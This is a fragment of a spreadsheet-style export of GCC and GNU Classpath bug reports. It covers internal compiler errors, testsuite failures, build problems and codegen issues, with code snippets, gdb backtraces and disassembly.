7f1af8564000-7f1af85b9000 r-xp 00000000 08:02 5072     /usr/lib64/libmpfr.so.4.0.1
7f1af85b9000-7f1af87b8000 ---p 00055000 08:02 5072     /usr/lib64/libmpfr.so.4.0.1
7f1af87b8000-7f1af87ba000 r--p 00054000 08:02 5072     /usr/lib64/libmpfr.so.4.0.1
7f1af87ba000-7f1af87bb000 rw-p 00056000 08:02 5072     /usr/lib64/libmpfr.so.4.0.1
7f1af87bb000-7f1af87ce000 r-xp 00000000 08:02 5110     /usr/lib64/libmpc.so.2.0.0
7f1af87ce000-7f1af89cd000 ---p 00013000 08:02 5110     /usr/lib64/libmpc.so.2.0.0
7f1af89cd000-7f1af89ce000 r--p 00012000 08:02 5110     /usr/lib64/libmpc.so.2.0.0
7f1af89ce000-7f1af89cf000 rw-p 00013000 08:02 5110     /usr/lib64/libmpc.so.2.0.0
7f1af89cf000-7f1af89d2000 r-xp 00000000 08:02 5115     /usr/lib64/libgmpxx.so.4.2.2
7f1af89d2000-7f1af8bd2000 ---p 00003000 08:02 5115     /usr/lib64/libgmpxx.so.4.2.2
7f1af8bd2000-7f1af8bd3000 r--p 00003000 08:02 5115     /usr/lib64/libgmpxx.so.4.2.2
7f1af8bd3000-7f1af8bd4000 rw-p 00004000 08:02 5115     /usr/lib64/libgmpxx.so.4.2.2
7f1af8bd4000-7f1af8cc3000 r-xp 00000000 08:02 5062     /usr/lib64/libppl.so.9.0.0
7f1af8cc3000-7f1af8ec3000 ---p 000ef000 08:02 5062     /usr/lib64/libppl.so.9.0.0
7f1af8ec3000-7f1af8ec4000 r--p 000ef000 08:02 5062     /usr/lib64/libppl.so.9.0.0
7f1af8ec4000-7f1af8ec6000 rw-p 000f0000 08:02 5062     /usr/lib64/libppl.so.9.0.0
7f1af8ec6000-7f1af8ec7000 rw-p 00000000 00:00 0 
7f1af8ec7000-7f1af92bd000 r-xp 00000000 08:02 5008     /usr/lib64/libppl_c.so.4.0.0
7f1af92bd000-7f1af94bc000 ---p 003f6000 08:02 5008     /usr/lib64/libppl_c.so.4.0.0
7f1af94bc000-7f1af94bd000 r--p 003f5000 08:02 5008     /usr/lib64/libppl_c.so.4.0.0
7f1af94bd000-7f1af94c1000 rw-p 003f6000 08:02 5008     /usr/lib64/libppl_c.so.4.0.0
7f1af94c1000-7f1af94c2000 rw-p 00000000 00:00 0 
7f1af94c2000-7f1af94e1000 r-xp 00000000 08:02 5146     /usr/lib64/libcloog.so.0.0.0
7f1af94e1000-7f1af96e1000 ---p 0001f000 08:02 5146     /usr/lib64/libcloog.so.0.0.0
7f1af96e1000-7f1af96e2000 r--p 0001f000 08:02 5146     /usr/lib64/libcloog.so.0.0.0
7f1af96e2000-7f1af96e3000 rw-p 00020000 08:02 5146     /usr/lib64/libcloog.so.0.0.0
7f1af96e3000-7f1af96e5000 rw-p 00000000 00:00 0 
7f1af96e5000-7f1af9705000 r-xp 00000000 08:02 34486382 /lib64/ld-2.14.1.so
7f1af9873000-7f1af98de000 rw-p 00000000 00:00 0 
7f1af98de000-7f1af98e2000 rw-p 00000000 00:00 0 
7f1af98f2000-7f1af9905000 rw-p 00000000 00:00 0 
7f1af9905000-7f1af9906000 r--p 00020000 08:02 34486382 /lib64/ld-2.14.1.so
7f1af9906000-7f1af9907000 rw-p 00021000 08:02 34486382 /lib64/ld-2.14.1.so
7f1af9907000-7f1af9908000 rw-p 00000000 00:00 0 
7fffae539000-7fffae55b000 rw-p 00000000 00:00 0        [stack]
7fffae5ff000-7fffae600000 r-xp 00000000 00:00 0        [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
../../../src/main.cpp:29:1: internal compiler error: Aborted</t>
  </si>
  <si>
    <t>ylalym</t>
  </si>
  <si>
    <t>GCC-70553</t>
  </si>
  <si>
    <t>pr70496.c should exclude Thumb only targets</t>
  </si>
  <si>
    <t>gcc.target/arm/pr70496.c fails with the following error when targeting Cortex-M3:
selected processor does not support ARM opcodes
Since the test contains a .arm directive it should skip Thumb only devices.</t>
  </si>
  <si>
    <t>GCC-43593</t>
  </si>
  <si>
    <t>Var-tracking unnecessarily flushes all call used registers on calls instead of regs invalidated by call</t>
  </si>
  <si>
    <t>Flushing e.g. sp on each call is completely unnecessary:
   for (r = 0 r &lt; FIRST_PSEUDO_REGISTER r++)
-    if (TEST_HARD_REG_BIT (call_used_reg_set r))
+    if (TEST_HARD_REG_BIT (regs_invalidated_by_call r))
       var_regno_delete (set r)</t>
  </si>
  <si>
    <t>GCC-57856</t>
  </si>
  <si>
    <t>for an uninitialized variable gcc assumes it already has value instead of report uninitialized warnings.</t>
  </si>
  <si>
    <t>Created attachment 30477
Related disassemble code.
For Linux kernel source code mm/vmscan.c function putback_lru_page() version is next-20130621.
Gcc assumes lru == LRU_UNEVICTABLE instead of report warnings (uninitializing lru).
I got gcc source code from svn configure &amp;&amp; make &amp;&amp; make install.
[root@gchenlinux linux-next]# which gcc
/usr/local/bin/gcc
[root@gchenlinux linux-next]# gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ./configure
Thread model: posix
gcc version 4.9.0 20130704 (experimental) (GCC)
The related source code:
 580 void putback_lru_page(struct page *page)
 581 {
 582         int lru
 583         int was_unevictable = PageUnevictable(page)
 584
 585         VM_BUG_ON(PageLRU(page))
 586
 587 redo:
 588         ClearPageUnevictable(page)
 589
 590         if (page_evictable(page)) {
 591                 /*
 592                  * For evictable pages we can use the cache.
 593                  * In event of a race worst case is we end up with an
 594                  * unevictable page on [in]active list.
 595                  * We know how to handle that.
 596                  */
 597                 lru_cache_add(page)
 598         } else {
 599                 /*
 600                  * Put unevictable pages directly on zone's unevictable
 601                  * list.
 602                  */
 603                 lru = LRU_UNEVICTABLE
 604                 add_page_to_unevictable_list(page)
 605                 /*
 606                  * When racing with an mlock or AS_UNEVICTABLE clearing
 607                  * (page is unlocked) make sure that if the other thread
 608                  * does not observe our setting of PG_lru and fails
 609                  * isolation/check_move_unevictable_pages
 610                  * we see PG_mlocked/AS_UNEVICTABLE cleared below and move
 611                  * the page back to the evictable list.
 612                  *
 613                  * The other side is TestClearPageMlocked() or shmem_lock().
 614                  */
 615                 smp_mb()
 616         }
 617
 618         /*
 619          * page's status can change while we move it among lru. If an evictable
 620          * page is on unevictable list it never be freed. To avoid that
 621          * check after we added it to the list again.
 622          */
 623         if (lru == LRU_UNEVICTABLE &amp;&amp; page_evictable(page)) {
 624                 if (!isolate_lru_page(page)) {
 625                         put_page(page)
 626                         goto redo
 627                 }
 628                 /* This means someone else dropped this page from LRU
 629                  * So it will be freed or putback to LRU again. There is
 630                  * nothing to do here.
 631                  */
 632         }
 633
 634         if (was_unevictable &amp;&amp; lru != LRU_UNEVICTABLE)
 635                 count_vm_event(UNEVICTABLE_PGRESCUED)
 636         else if (!was_unevictable &amp;&amp; lru == LRU_UNEVICTABLE)
 637                 count_vm_event(UNEVICTABLE_PGCULLED)
 638
 639         put_page(page)         /* drop ref from isolate */
 640 }
/*
 * Related disassemble code:
 *   make defconfig under x86_64 PC.
 *   make menuconfig (choose Automount devtmpfs at /dev... and KGDB)
 *   make V=1 EXTRA_CFLAGS=-W (not find related warnings ref warn.log in attachment)
 *   objdump -d vmlinux &gt; vmlinux.S
 *   vi vmlinux.S
 *
 * The issue is: compiler assumes lru == LRU_UNEVICTABLE instead of report warnings (uninitializing lru)
 */
ffffffff810f3d20 :
ffffffff810f3d20:       55                      push   %rbp
ffffffff810f3d21:       48 89 e5                mov    %rsp%rbp
ffffffff810f3d24:       41 55                   push   %r13
ffffffff810f3d26:       41 54                   push   %r12
ffffffff810f3d28:       4c 8d 67 02             lea    0x2(%rdi)%r12    for ClearPageUnevictable(page)
ffffffff810f3d2c:       53                      push   %rbx
ffffffff810f3d2d:       4c 8b 2f                mov    (%rdi)%r13       was_unevictable = PageUnevictable(page)
ffffffff810f3d30:       48 89 fb                mov    %rdi%rbx
ffffffff810f3d33:       49 c1 ed 14             shr    $0x14%r13
ffffffff810f3d37:       41 83 e5 01             and    $0x1%r13d
ffffffff810f3d3b:       eb 28                   jmp    ffffffff810f3d65 
ffffffff810f3d3d:       0f 1f 00                nopl   (%rax)
/* if(page_evictable(page)) { */
ffffffff810f3d40:       e8 db c7 ff ff          callq  ffffffff810f0520 
/* } */
/* if (lru == LRU_UNEVICTABLE &amp;&amp; page_evictable(page)) { */
                                                         assmue lru == LRU_UNEVICTABLE
ffffffff810f3d45:       48 89 df                mov    %rbx%rdi
ffffffff810f3d48:       e8 a3 ff ff ff          callq  ffffffff810f3cf0 
ffffffff810f3d4d:       85 c0                   test   %eax%eax
ffffffff810f3d4f:       74 3d                   je     ffffffff810f3d8e 
ffffffff810f3d51:       48 89 df                mov    %rbx%rdi
ffffffff810f3d54:       e8 87 fb ff ff          callq  ffffffff810f38e0 
ffffffff810f3d59:       85 c0                   test   %eax%eax
ffffffff810f3d5b:       75 31                   jne    ffffffff810f3d8e 
ffffffff810f3d5d:       48 89 df                mov    %rbx%rdi
ffffffff810f3d60:       e8 3b c1 ff ff          callq  ffffffff810efea0 
/* redo: */
/* ClearPageUnevictable(page) */
ffffffff810f3d65:       f0 41 80 24 24 ef       lock andb $0xef(%r12)
/* if(page_evictable(page)) { */
ffffffff810f3d6b:       48 89 df                mov    %rbx%rdi
ffffffff810f3d6e:       e8 7d ff ff ff          callq  ffffffff810f3cf0 
ffffffff810f3d73:       85 c0                   test   %eax%eax
ffffffff810f3d75:       48 89 df                mov    %rbx%rdi
ffffffff810f3d78:       75 c6                   jne    ffffffff810f3d40 
/* else { */
                                                         assume lru == LRU_UNEVICTABLE
ffffffff810f3d7a:       e8 c1 c7 ff ff          callq  ffffffff810f0540 
ffffffff810f3d7f:       0f ae f0                mfence
/* } */
/* if (lru == LRU_UNEVICTABLE &amp;&amp; page_evictable(page)) { */
                                                         assmue lru == LRU_UNEVICTABLE
ffffffff810f3d82:       48 89 df                mov    %rbx%rdi
ffffffff810f3d85:       e8 66 ff ff ff          callq  ffffffff810f3cf0 
ffffffff810f3d8a:       85 c0                   test   %eax%eax
ffffffff810f3d8c:       75 c3                   jne    ffffffff810f3d51 
/* } */
/* if (was_unevictable &amp;&amp; lru != LRU_UNEVICTABLE) */
/* ... */
/* else if (!was_unevictable &amp;&amp; lru == LRU_UNEVICTABLE) */
ffffffff810f3d8e:       4d 85 ed                test   %r13%r13                 !was_unevictable assmue lru == LRU_UNEVICTABLE
ffffffff810f3d91:       75 09                   jne    ffffffff810f3d9c 
ffffffff810f3d93:       65 48 ff 04 25 68 f0    incq   %gs:0xf068        count_vm_event(UNEVICTABLE_PGCULLED)
                                                                         incq %gs:0xf078 for count_vm_event(UNEVICTABLE_PGRESCUED)
ffffffff810f3d9a:       00 00 
/* put_page() */
ffffffff810f3d9c:       48 89 df                mov    %rbx%rdi
ffffffff810f3d9f:       e8 fc c0 ff ff          callq  ffffffff810efea0 
ffffffff810f3da4:       5b                      pop    %rbx
ffffffff810f3da5:       41 5c                   pop    %r12
ffffffff810f3da7:       41 5d                   pop    %r13
ffffffff810f3da9:       5d                      pop    %rbp
ffffffff810f3daa:       c3                      retq
ffffffff810f3dab:       0f 1f 44 00 00          nopl   0x0(%rax%rax1)
ffffffff81dc4d8a:       c3                      retq</t>
  </si>
  <si>
    <t>GCC-34246</t>
  </si>
  <si>
    <t>gfortran.dg/bind_c_usage_16.f03 doesn't  work</t>
  </si>
  <si>
    <t>From
http://gcc.gnu.org/ml/gcc-testresults/2007-11/msg01452.html
FAIL: gfortran.dg/bind_c_usage_16.f03  -O0  execution test
FAIL: gfortran.dg/bind_c_usage_16.f03  -O1  execution test
FAIL: gfortran.dg/bind_c_usage_16.f03  -O2  execution test
FAIL: gfortran.dg/bind_c_usage_16.f03  -O3 -fomit-frame-pointer  execution test
FAIL: gfortran.dg/bind_c_usage_16.f03  -O3 -fomit-frame-pointer -funroll-loops  execution test
FAIL: gfortran.dg/bind_c_usage_16.f03  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
FAIL: gfortran.dg/bind_c_usage_16.f03  -O3 -g  execution test
FAIL: gfortran.dg/bind_c_usage_16.f03  -Os  execution test</t>
  </si>
  <si>
    <t>GCC-46346</t>
  </si>
  <si>
    <t>[4.6 regression] fma testsuite failures</t>
  </si>
  <si>
    <t>FAIL: gcc.target/powerpc/ppc-fma-1.c scan-assembler-times xvmadd 4
FAIL: gcc.target/powerpc/ppc-fma-1.c scan-assembler-times xsmadd 2
FAIL: gcc.target/powerpc/ppc-fma-1.c scan-assembler-times fmadds 2
FAIL: gcc.target/powerpc/ppc-fma-1.c scan-assembler-times xvmsub 2
FAIL: gcc.target/powerpc/ppc-fma-1.c scan-assembler-times xsmsub 1
FAIL: gcc.target/powerpc/ppc-fma-1.c scan-assembler-times fmsubs 1
FAIL: gcc.target/powerpc/ppc-fma-1.c scan-assembler-times xvnmadd 2
FAIL: gcc.target/powerpc/ppc-fma-1.c scan-assembler-times xsnmadd 1
FAIL: gcc.target/powerpc/ppc-fma-1.c scan-assembler-times fnmadds 1
FAIL: gcc.target/powerpc/ppc-fma-1.c scan-assembler-times xvnmsub 2
FAIL: gcc.target/powerpc/ppc-fma-1.c scan-assembler-times xsnmsub 1
FAIL: gcc.target/powerpc/ppc-fma-1.c scan-assembler-times fnmsubs 1
FAIL: gcc.target/powerpc/ppc-fma-2.c scan-assembler-times xvmadd 2
FAIL: gcc.target/powerpc/ppc-fma-2.c scan-assembler-times xsmadd 1
FAIL: gcc.target/powerpc/ppc-fma-2.c scan-assembler-times fmadds 1
FAIL: gcc.target/powerpc/ppc-fma-2.c scan-assembler-times xvmsub 2
FAIL: gcc.target/powerpc/ppc-fma-2.c scan-assembler-times xsmsub 1
FAIL: gcc.target/powerpc/ppc-fma-2.c scan-assembler-times fmsubs 1
FAIL: gcc.target/powerpc/ppc-fma-2.c scan-assembler-times xvnmadd 2
FAIL: gcc.target/powerpc/ppc-fma-2.c scan-assembler-times xsnmadd 1
FAIL: gcc.target/powerpc/ppc-fma-2.c scan-assembler-times fnmadds 1
FAIL: gcc.target/powerpc/ppc-fma-2.c scan-assembler-times xvnmsub 2
FAIL: gcc.target/powerpc/ppc-fma-2.c scan-assembler-times xsnmsub 1
FAIL: gcc.target/powerpc/ppc-fma-2.c scan-assembler-times fnmsubs 1
FAIL: gcc.target/powerpc/ppc-fma-3.c scan-assembler-times vmaddfp 2
FAIL: gcc.target/powerpc/ppc-fma-3.c scan-assembler-times fmadds 2
FAIL: gcc.target/powerpc/ppc-fma-4.c scan-assembler-times vmaddfp 1
FAIL: gcc.target/powerpc/ppc-fma-4.c scan-assembler-times fmadd  1
FAIL: gcc.target/powerpc/ppc-fma-4.c scan-assembler-times fmadds 1
ppc-fma-5.c: In function 'main':
ppc-fma-5.c:26:1: internal compiler error: in rhs_to_tree at tree-ssa-forwprop.c:352
FAIL: gcc.target/powerpc/ppc-fmadd-1.c scan-assembler-not f(add|sub|mul|neg)</t>
  </si>
  <si>
    <t>CLASSPATH-57070</t>
  </si>
  <si>
    <t>VMProcess needs to notifyAll() instead of notify()</t>
  </si>
  <si>
    <t>Created attachment 29940
Test code to reproduce bug
VMProcess performs a notify() on state change rather than notifyAll() this means that if one thread waitFor() process termination and another calls destroy() then only one of the two will be woken up.
This occurs during stress testing with Dacapo 2006's Eclipse benchmark on JikesRVM .  Eclipses uses java.lang.Process to execute external commands with a timeout.  Under high load the external processes do not finish within the timeout period and destroy() is called.  At the same time Eclipse's process monitor thread is waiting in waitFor().  Only the waitFor() thread detects termination the destroy() thread is never resumed.
The attached program can reproduce the bug in miniature.
Interestingly the javadoc suggests that VMProcess should notifyAll() already however no versions of the file in CVS or Git appear to have ever performed a notifyAll().</t>
  </si>
  <si>
    <t>c.g.ritson</t>
  </si>
  <si>
    <t>GCC-6817</t>
  </si>
  <si>
    <t>gcc-3.1 make install fails</t>
  </si>
  <si>
    <t>while doing make install install fails with:
/bin/sh: -c: line 1: syntax error near unexpected token `'
i had the sources in /usr/local2/src and tried to build gcc in /usr/local2/tmp. --prefix=/usr/local/tmp/built. but same error came up with other build destinations and also while building in source-dir.
configure opts: 
CC=gcc.gcc32 /usr/local2/src/gcc-3.1/configure --enable-shared --enable-threads=posix --enable-long-long --enable-multilib --with-gnu-as --with-gnu-ld --with-system-zlib --prefix=/usr/local2/tmp/builddir
last part of 'make install' output:
/bin/sh: -c: line 1: syntax error near unexpected token `'
/bin/sh: -c: line 1: `for cat in  do  lang=`basename $cat | sed 's/\.gmo$//'`  if [ -f $cat ] then :  elif [ -f /usr/local2/src/gcc-3.1/gcc/$cat ] then cat=/usr/local2/src/gcc-3.1/gcc/$cat  else continue  fi  dir=/usr/local2/tmp/builddir/share/locale/$lang/LC_MESSAGES  echo /bin/sh /usr/local2/src/gcc-3.1/gcc/mkinstalldirs $dir  /bin/sh /usr/local2/src/gcc-3.1/gcc/mkinstalldirs $dir || exit 1  echo /bin/sh /usr/local2/src/gcc-3.1/install-sh -c -m 644 $cat $dir/gcc.mo  /bin/sh /usr/local2/src/gcc-3.1/install-sh -c -m 644 $cat $dir/gcc.mo  done'
make[1]: *** [install-po] Fehler 2
make[1]: Verlassen des Verzeichnisses Verzeichnis Â»/usr/local2/tmp/gccÂ«
make: *** [install-gcc] Fehler 2
Release:
gcc-3.1
Environment:
i686-pc-linux-gnu libc-2.2.4 linux-lfs built with gcc-3.0.2 but also with gcc-2.95.3 the same
How-To-Repeat:
make install</t>
  </si>
  <si>
    <t>joy</t>
  </si>
  <si>
    <t>GCC-25071</t>
  </si>
  <si>
    <t>dummy argument larger than actual argument</t>
  </si>
  <si>
    <t>using GNU Fortran 95 (GCC) 4.1.0 20051126 (prerelease)  with '-g -pedantic -std=f95' I get a bad / no diagnostic for the following invalid code:
INTEGER :: I(22)
CALL TST(I)
CONTAINS
 SUBROUTINE TST(I)
  INTEGER :: I(6)
 END SUBROUTINE TST
END</t>
  </si>
  <si>
    <t>GCC-3394</t>
  </si>
  <si>
    <t>ICE in tree_low_cst at tree.c:3462</t>
  </si>
  <si>
    <t>[ Tried attaching this file but it always ends up with
only the first short paragraph ]
The following code will crash the C++ front-end a regression from
gcc-2.95.x.
struct
__attribute__((dllexport))
DllClassBase { }
struct
__attribute__((dllexport))
DllClass : public DllClassBase { }
The problem is quite simple -- when parsing the derived class DllClass
the parameter passed to tree_low_cst in xref_basetypes has the type
TREE_LIST thanks to the attribute between class and name.
Patch at end of this report. Hmmm ... should I send this separately to
gcc-patches as well?
(gdb) r -quiet -version dll-bug1.ii
Starting program: /homes/khan/src/win32/cygwin/BUILD/orig-gcc3/gcc/cc1plus
-quiet -version dll-bug1.ii
Breakpoint 1 at 0x400411d2: file exit.c line 40.
Breakpoint 3 at 0x40040008: file ../sysdeps/generic/abort.c line 55.
GNU CPP version 3.0 (cpplib) (80386 BSD syntax)
GNU C++ version 3.0 (i686-pc-cygwin)
        compiled by GNU C version 3.0.
Breakpoint 2 fancy_abort (
    file=0x8370ec0 /home/khan/src/gnu/gcc-3.0/gcc/tree.c line=3462
    function=0x8371972 tree_low_cst)
    at /home/khan/src/gnu/gcc-3.0/gcc/diagnostic.c:1760
1760      internal_error (Internal compiler error in %s at %s:%d
(gdb) bt
#0  fancy_abort (file=0x8370ec0 /home/khan/src/gnu/gcc-3.0/gcc/tree.c
    line=3462 function=0x8371972 tree_low_cst)
    at /home/khan/src/gnu/gcc-3.0/gcc/diagnostic.c:1760
#1  0x810e0fa in tree_low_cst (t=0x40174230 pos=1)
    at /home/khan/src/gnu/gcc-3.0/gcc/tree.c:3462
#2  0x806e814 in xref_basetypes (code_type_node=0x40174230
name=0x40176100
    ref=0x40175478 binfo=0x40174280)
    at /home/khan/src/gnu/gcc-3.0/gcc/cp/decl.c:12768
#3  0x80af0d5 in yyparse_1 () at /usr/lib/bison.simple:2409
#4  0x80fd26d in yyparse () at /home/khan/src/gnu/gcc-3.0/gcc/c-lex.c:158
#5  0x81026e3 in compile_file (name=0x844f2d7 dll-bug1.ii)
    at /home/khan/src/gnu/gcc-3.0/gcc/toplev.c:2369
#6  0x81069c6 in main (argc=4 argv=0xbffff6e4)
    at /home/khan/src/gnu/gcc-3.0/gcc/toplev.c:4990
(gdb) up
#1  0x810e0fa in tree_low_cst (t=0x40174230 pos=1)
    at /home/khan/src/gnu/gcc-3.0/gcc/tree.c:3462
3462        abort ()
(gdb) up
#2  0x806e814 in xref_basetypes (code_type_node=0x40174230 name=0x40176100 ref=0x40175478 binfo=0x40174280)
    at /home/khan/src/gnu/gcc-3.0/gcc/cp/decl.c:12768
12768     enum tag_types tag_code = (enum tag_types) tree_low_cst (code_type_node 1)
(gdb) p code_type_node
$1 = 0x40174230
(gdb) pt
 &lt;tree_list 0x40174230
    purpose &lt;tree_list 0x401741f4
        purpose &lt;identifier_node 0x40170380 dllexport
            bindings &gt;&gt;
    value  constant 0&gt;&gt;
2001-06-22  Mumit Khan  
        * decl.c (xref_basetypes): Handle attributes between 'class' and
        name.
Index: gcc/cp/decl.c
===================================================================
RCS file: /homes/khan/src/win32/cygwin/CVSROOT/gcc-3.0/gcc/cp/decl.cv
retrieving revision 1.2
diff -u -3 -p -r1.2 decl.c
--- gcc/cp/decl.c       2001/06/21 04:44:06     1.2
+++ gcc/cp/decl.c       2001/06/22 15:15:12
@@ -127656 +1276514 @@ xref_basetypes (code_type_node name re
   tree base
   int i len
+
+  /* If we are called from the parser code_type_node will sometimes be a
+     TREE_LIST.  This indicates that the user wrote
+     class __attribute__ ((foo)) bar.  Extract the attributes so that
+     tree_low_cst doesn't crash.  */
+  if (TREE_CODE (code_type_node) == TREE_LIST)
+    code_type_node = TREE_VALUE (code_type_node)
+
   enum tag_types tag_code = (enum tag_types) tree_low_cst (code_type_node 1)
   if (tag_code == union_type)
Release:
3.0
Environment:
Cygwin Mingw and other x86-win32 targets. Host independent.
How-To-Repeat:
Just compiling the provided testcase will trigger the problem.</t>
  </si>
  <si>
    <t>khan</t>
  </si>
  <si>
    <t>GCC-34019</t>
  </si>
  <si>
    <t>Minor typo in gcj documentation</t>
  </si>
  <si>
    <t>Page 15 of the 4.2.2 gcj manual (and also the current manual) contains this line:
In the below a directory or path component can refer either to an actual directory on the filesystem...
This should read In the below options ... or something similar.  below is not a noun and cannot stand alone.</t>
  </si>
  <si>
    <t>nightstrike</t>
  </si>
  <si>
    <t>GCC-81376</t>
  </si>
  <si>
    <t>unnecessary cast before comparison</t>
  </si>
  <si>
    <t>Take the following code:
typedef double c_t
typedef int a_t
int f(a_t a1 a_t a2) {
  return (c_t) a1 &lt; (c_t) a2
}
With IEEE 754 double we have a 52 bits mantissa which is wide enough to represent all of the 'int' values exactly.  No possibility for imprecision and especially not for Inf or NaN.
Still gcc (trunk as of today but likely older versions as well) generate the code for the conversion.  This is for x86-64 with -O2:
f:
	vxorpd	%xmm0 %xmm0 %xmm0
	vxorpd	%xmm1 %xmm1 %xmm1
	xorl	%eax %eax
	vcvtsi2sd	%edi %xmm0 %xmm0
	vcvtsi2sd	%esi %xmm1 %xmm1
	vucomisd	%xmm0 %xmm1
	seta	%al
	ret
A simple
        xorl	%eax %eax
	cmpl	%esi %edi
	setl	%al
	ret
is sufficient just as if c_t above would be defined as 'int'.</t>
  </si>
  <si>
    <t>ygribov</t>
  </si>
  <si>
    <t>drepper.fsp+rhbz</t>
  </si>
  <si>
    <t>GCC-54142</t>
  </si>
  <si>
    <t>[4.8 regression] ppc64 build failure - Unrecognized opcode: `sldi' (and `srdi`)</t>
  </si>
  <si>
    <t>On several PPC64 systems we are seeing the following build failure.
/home/garyf/gcc-4.8/wrk/./gcc/xgcc -B/home/garyf/gcc-4.8/wrk/./gcc/
[...]
 -I/home/garyf/gcc-4.8/src/libgcc/../libdecnumber -DHAVE_CC_TLS  -o _gcov_execle.o -MT _g
cov_execle.o -MD -MP -MF _gcov_execle.dep -DL_gcov_execle -c /home/garyf/gcc-4.
8/src/libgcc/libgcov.c
/tmp/ccqVYRai.s: Assembler messages:
/tmp/ccqVYRai.s:63: Error: Unrecognized opcode: `sldi'
/tmp/ccqVYRai.s:66: Error: Unrecognized opcode: `srdi'
/tmp/ccqVYRai.s:67: Error: Unrecognized opcode: `sldi'
/tmp/ccqVYRai.s:73: Error: Unrecognized opcode: `srdi'
/tmp/ccqVYRai.s:74: Error: Unrecognized opcode: `sldi'
/tmp/ccqVYRai.s:88: Error: Unrecognized opcode: `sldi'
The failures above use the gcc-4.8-20120729 snapshot which is based on svn revision 189947.
The configure target is: powerpc64-unknown-linux-gnu
This was built on a rather old (FC6) system running on a Mac G5 but we have seen it also fail on newer PPC64 systems.</t>
  </si>
  <si>
    <t>GCC-48814</t>
  </si>
  <si>
    <t>[4.5/4.6/4.7 Regression] Incorrect scalar increment result</t>
  </si>
  <si>
    <t>The following test-case should output 2 3 but GCC outputs 1 2:
#include 
int arr[] = {1234}
int count = 0
int incr(){
 return ++count
}
int main(){  
   arr[count++]=incr()
   printf(%d %dcountarr[count])    
   return 0
}
(it may not be obvious see http://stackoverflow.com/questions/5827707/why-this-output/5828578#5828578 ). Clang correctly handles this case.</t>
  </si>
  <si>
    <t>GCC-8550</t>
  </si>
  <si>
    <t>undefined reference to fill and fill_n</t>
  </si>
  <si>
    <t xml:space="preserve">	
The fill and fill_n functions are missing when compiled with -fno-implicit-template
leading to an error at link time.
This is similar to bug 8172 in which I reported a missing operator+ for strings.
Release:
3.2
Environment:
System: Linux tux75.llnl.gov 2.4.9-31smp #1 SMP Tue Feb 26 06:55:00 EST 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.2/configure --prefix=/usr/apps/gcc/3.2
How-To-Repeat:
Program text:
#include 
using namespace std
int main() {
  double x[10]
  fill_n( x 10 1.0 )
  fill( x x+10 2.0 )
  return 0
}
Compile command:
g++ -fno-implicit-templates  nofill.cc</t>
  </si>
  <si>
    <t>gunney</t>
  </si>
  <si>
    <t>GCC-7006</t>
  </si>
  <si>
    <t>ccmips crashes in compilation</t>
  </si>
  <si>
    <t>Can be condensed on the following:
/*header*/
Class A
{ private:
    enum MyEnum {a b}
    typedef A::MyEnum (A::* METHOD) () 
    struct MyStruct
    { int value
      METHOD pMethod
    }
    A::MyEnum Method1(void)
}
/*code*/
MyStruct array[]=
{ 1 Method1
}
reduced file is attached
Release:
gcc version gcc-2.96 19990621 (experimental)
Environment:
MS Windows2000 5.00.2195 Service Pack 1
Vectra VL 600 x86 Family 6 Model 8 Stepping 6 AT/AT COMPATIBEL 130.544 KB RAM
How-To-Repeat:
With the command:
        ccmips -EL -mcpu=r4000 -mips3 -mgp32 -mfp32 -G 0 -fno-strict-aliasing -ansi  -fno-implicit-templates -DVXW_EXPLICIT_TEMPLATES -O2 -funroll-loops   -IZ:/ont-environment/vxWorks/target/h  -I:/ -IZ:/rainbowLory/Firmware -IZ:/ont-envir
onment/vxWorks/target/config/vr4122-rainbowlory -IZ:/rainbowLory/Firmware/Measur
ement/lowLevel -IZ:/rainbowLory/Firmware/Measurement/common -DCPU=VR4100 -DMIPSE
L -DSOFT_FLOAT  -DNO_ASSERT_PANIC -DDEBUG -Wall -fno-exceptions -DVXWORKS -DTRAC
E -g -O0 -msoft-float -c -o _Debug/phtCommand.o 
Has been obtained the error:
phtCommand.cpp
phtCommand.cpp: In method `CPhtCommand::CPhtCommand()':
phtCommand.cpp:186: assuming &amp; on `CPhtCommand::GetVersion'
phtCommand.cpp:186: Internal compiler error in `const_hash' at varasm.c:2390
Please submit a full bug report to `egcs-bugs@egcs.cygnus.com'.
See  for details.
*** Error code 1</t>
  </si>
  <si>
    <t>jose-alfonso_torres</t>
  </si>
  <si>
    <t>GCC-1283</t>
  </si>
  <si>
    <t>jc1 fatal signal when compiling jikes-compiled class</t>
  </si>
  <si>
    <t>Compiling the code below with jikes then
with gcj -c gives the following error:
Test1.java: In class `Test1':
Test1.java: In method `foo()':
Test1.java:5: warning: Unreachable bytecode from 14 to before 19.
gcj: Internal compiler error: program jc1 got fatal signal 11
Release:
gcj 2.96 20000612
Environment:
Debian GNU/Linux potato
How-To-Repeat:
public class Test1 {
	public void foo() {
		synchronized(this) {
			int dummy = 0
		}
	}
}</t>
  </si>
  <si>
    <t>GCC-33637</t>
  </si>
  <si>
    <t>[4.5 Regression] checking for nm: test: too many arguments causes Undefined symbol: __gxx_personality_v0</t>
  </si>
  <si>
    <t>Sorry for the details - might not be required as I already tracked down the problem to the source line...
When NM_FOR_TARGET requires arguments (fex -B -X32_64 for aix) checking for nm in gcc/configure{.ac} is broken:
Assume 
*) source is /source/gcc-4.2.0
*) builddir is /build
*) configured --prefix=/prefix (and others but irrelevant)
checking what assembler to use... /usr/ccs/bin/as
checking what linker to use... /usr/ccs/bin/ld
/source/gcc-4.2.0/gcc/configure: line 13513: test: too many arguments
checking for powerpc-ibm-aix5.3.0.0-nm... /usr/bin/nm
checking what nm to use... /usr/bin/nm
checking for objdump... no
This only becomes a real problem when there is some symlink or wrapper available as /prefix/${target}/bin/nm or somehow else NM_FOR_TARGET already contains full path.
checking what assembler to use... /prefix/powerpc-ibm-aix5.3.0.0/bin/as
checking what linker to use... /prefix/powerpc-ibm-aix5.3.0.0/bin/ld
/source/gcc-4.2.0/gcc/configure: line 13513: test: too many arguments
checking for /prefix/powerpc-ibm-aix5.3.0.0/bin/nm... no
checking what nm to use...
checking for objdump... no
So it ends up with no nm at all.
The follow-up problems are:
1) generated builddir/gcc/nm is (missing /path/to/nm)
